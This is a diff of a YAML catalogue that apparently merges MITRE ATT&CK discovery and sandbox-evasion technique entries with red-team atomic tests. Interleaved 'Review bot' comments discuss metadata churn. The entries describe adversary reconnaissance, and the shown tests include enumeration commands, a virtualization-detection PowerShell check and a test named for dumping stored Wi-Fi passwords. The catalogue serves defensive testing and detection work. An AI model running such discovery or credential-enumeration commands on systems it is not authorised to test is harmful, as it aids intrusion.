+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Group: Group Metadata'
@@ -99168,13 +99880,12 @@ discovery:
url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1069.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:51:35.759Z'
name: Cloud Groups
description: |-
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -99199,12 +99910,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -99246,13 +99956,12 @@ discovery:
url: https://github.com/True-Demon/raindance
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1615:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-01-06T12:41:08.579Z'
name: Group Policy Discovery
description: |-
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\SYSVOL\\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -99313,7 +100022,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1615
atomic_tests:
- name: Display group policy information via gpresult
@@ -99404,7 +100112,7 @@ discovery:
elevation_required: true
T1652:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:07:16.804Z'
name: Device Driver Discovery
description: |-
Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -99468,7 +100176,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1652
atomic_tests:
- name: Device Driver Discovery
@@ -99490,14 +100197,14 @@ discovery:
elevation_required: false
T1087.002:
technique:
- modified: '2024-04-15T21:33:57.732Z'
+ modified: '2024-05-31T04:00:37.651Z'
name: 'Account Discovery: Domain Account'
description: "Adversaries may attempt to get a listing of domain accounts. This
information can help adversaries determine which domain accounts exist to
aid in follow-on behavior such as targeting specific accounts which possess
particular privileges.\n\nCommands such as net user /domain
and
net group /domain
of the [Net](https://attack.mitre.org/software/S0039)
- utility, dscacheutil -q group
on macOS, and ldapsearch
+ utility, dscacheutil -q group
on macOS, and ldapsearch
on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
cmdlets including Get-ADUser
and Get-ADGroupMember
may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
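Review bot: the removed and added pair `utility, dscacheutil -q group` / `on macOS, and ldapsearch` in this hunk is identical as displayed, so the only difference is whitespace or a non-printing character (trailing space, tab, or a non-breaking space inside the quoted description). Confirm which with `git diff --word-diff-regex=. --ws-error-highlight=all` or `cat -A` before merging, and have the generator normalise whitespace on output so this kind of no-op churn does not come back on the next regeneration.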
@@ -99544,7 +100251,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.002
atomic_tests:
- name: Enumerate all accounts (Domain)
@@ -100195,7 +100901,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.001
atomic_tests:
- name: Enumerate all accounts (Local)
@@ -100394,7 +101099,7 @@ discovery:
name: command_prompt
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -100484,13 +101189,12 @@ discovery:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests:
- name: Detect Virtualization Environment (Linux)
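Review bot: the refreshed Deloitte reference changes the Drive link from the bare file URL to `.../1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit` and the retrieval date to `September 13, 2024`; verify that the `/edit` form of the link actually opens for an unauthenticated reader (the usual shareable form ends in `/view`) before treating this as a link fix. The identical URL and date change recurs in the T1497.003 hunk below, so whatever the verdict, apply it to both, or leave both exactly as the source bundle has them and say so in the commit message.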
@@ -100574,7 +101278,7 @@ discovery:
if((($Manufacturer.ToLower() -eq "microsoft corporation") -and ($Model.ToLower().contains("virtual"))) -or ($Manufacturer.ToLower().contains("vmware")) -or ($Model.ToLower() -eq "virtualbox")) {write-host "Virtualization environment detected!"} else {write-host "No virtualization environment detected!"}
T1069.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:16:47.754Z'
name: 'Permission Groups Discovery: Domain Groups'
description: |-
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
@@ -100617,7 +101321,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.002
atomic_tests:
- name: Basic Permission Groups Discovery Windows (Domain)
@@ -100963,7 +101666,7 @@ discovery:
name: sh
T1007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:55:18.326Z'
name: System Service Discovery
description: |-
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query
, tasklist /svc
, systemctl --type=service
, and net start
.
@@ -101004,7 +101707,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1007
atomic_tests:
- name: System Service Discovery
@@ -101067,7 +101769,7 @@ discovery:
command: powershell.exe Get-Service
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -101152,7 +101854,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests:
- name: Packet Capture Linux using tshark or tcpdump
@@ -101728,7 +102429,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1135
atomic_tests:
- name: Network Share Discovery
@@ -102000,7 +102700,7 @@ discovery:
elevation_required: false
T1120:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:41.575Z'
name: Peripheral Device Discovery
description: 'Adversaries may attempt to gather information about attached peripheral
devices and components connected to a computer system.(Citation: Peripheral
@@ -102051,7 +102751,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1120
atomic_tests:
- name: Win32_PnPEntity Hardware Inventory
@@ -102102,7 +102801,7 @@ discovery:
'
T1082:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:42:22.247Z'
name: System Information Discovery
description: |-
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -102113,7 +102812,6 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Maril Vernon @shewhohacks
- Praetorian
@@ -102128,7 +102826,6 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- IaaS
@@ -102176,7 +102873,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1082
atomic_tests:
- name: System Information Discovery
@@ -102901,7 +103599,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016.002
atomic_tests:
- name: Enumerate Stored Wi-Fi Profiles And Passwords via netsh
@@ -102916,7 +103613,7 @@ discovery:
elevation_required: false
T1010:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:22:56.372Z'
name: Application Window Discovery
description: |-
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -102958,12 +103655,11 @@ discovery:
- source_name: Prevailion DarkWatchman 2021
description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
new evolution in fileless techniques. Retrieved January 10, 2022.'
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1010
atomic_tests:
- name: List Process Main Windows - C# .NET
@@ -103005,112 +103701,64 @@ discovery:
name: command_prompt
T1087.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
- type: attack-pattern
- created: '2020-02-21T21:08:33.237Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.003
- url: https://attack.mitre.org/techniques/T1087/003
- - source_name: Microsoft Exchange Address Lists
- url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
- description: Microsoft. (2020, February 7). Address lists in Exchange Server.
- Retrieved March 26, 2020.
- - source_name: Microsoft getglobaladdresslist
- url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
- description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
- 2019.
- - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
- Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
- source_name: Black Hills Attacking Exchange MailSniper, 2016
- - source_name: Google Workspace Global Access List
- url: https://support.google.com/a/answer/166870?hl=en
- description: Google. (n.d.). Retrieved March 16, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-17T20:35:35.125Z'
name: Email Account
description: |-
Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
- In on-premises Exchange and Exchange Online, theGet-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+ In on-premises Exchange and Exchange Online, the Get-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_deprecated: false
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1497.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
+ id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+ created: '2020-02-21T21:08:33.237Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1087/003
+ external_id: T1087.003
+ - source_name: Black Hills Attacking Exchange MailSniper, 2016
+ description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+ Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+ - source_name: Google Workspace Global Access List
+ description: Google. (n.d.). Retrieved March 16, 2021.
+ url: https://support.google.com/a/answer/166870?hl=en
+ - source_name: Microsoft Exchange Address Lists
+ description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+ Retrieved March 26, 2020.
+ url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+ - source_name: Microsoft getglobaladdresslist
+ description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+ 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1497.003:
+ technique:
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
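Review bot: nearly all of this hunk is key reordering (`x_mitre_platforms`, `x_mitre_domains`, `id`, `created` and `external_references` move from the top of the T1087.003 and T1497.003 objects to below the description), which buries the two substantive changes: the description fix from `theGet-GlobalAddressList` to `the Get-GlobalAddressList`, and the removal of `x_mitre_permissions_required: - User` from T1087.003. Confirm the dropped field comes from the source bundle rather than from the generator no longer copying it, since anything keyed on it now sees it missing, and have the generator emit object keys in one stable order (sorted, or exactly the upstream order) so a regeneration diff shows only what actually changed.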
@@ -103125,6 +103773,12 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -103134,9 +103788,14 @@ discovery:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -103146,8 +103805,44 @@ discovery:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests:
- name: Delay execution with ping
@@ -103176,91 +103871,90 @@ discovery:
name: sh
T1580:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Cloud Infrastructure Discovery
+ description: |-
+ An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+ Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+ An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Regina Elwell
- Praetorian
- Isif Ibrahima, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+ components. Monitor logs for actions that could be taken to gather information
+ about cloud infrastructure, including the use of discovery API calls by new
+ or unexpected users and enumerations from unknown or malicious IP addresses.
+ To reduce false positives, valid change management procedures could introduce
+ a known identifier that is logged with the change (e.g., tag or header) if
+ supported by the cloud provider, to help distinguish valid, expected actions
+ from malicious ones.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Instance: Instance Enumeration'
+ - 'Cloud Storage: Cloud Storage Enumeration'
+ - 'Volume: Volume Enumeration'
+ - 'Snapshot: Snapshot Enumeration'
type: attack-pattern
id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
created: '2020-08-20T17:51:25.671Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1580
url: https://attack.mitre.org/techniques/T1580
+ external_id: T1580
- source_name: Expel IO Evil in AWS
- url: https://expel.io/blog/finding-evil-in-aws/
description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
Evil in AWS. Retrieved June 25, 2020.
+ url: https://expel.io/blog/finding-evil-in-aws/
- source_name: AWS Head Bucket
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
14, 2022.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
- source_name: AWS Get Public Access Block
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
- source_name: AWS Describe DB Instances
- url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
- source_name: Amazon Describe Instance
- url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
description: Amazon. (n.d.). describe-instance-information. Retrieved March
3, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
- source_name: Amazon Describe Instances API
- url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
- source_name: Google Compute Instances
- url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
description: Google. (n.d.). gcloud compute instances list. Retrieved May
26, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
- source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
- source_name: Microsoft AZ CLI
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
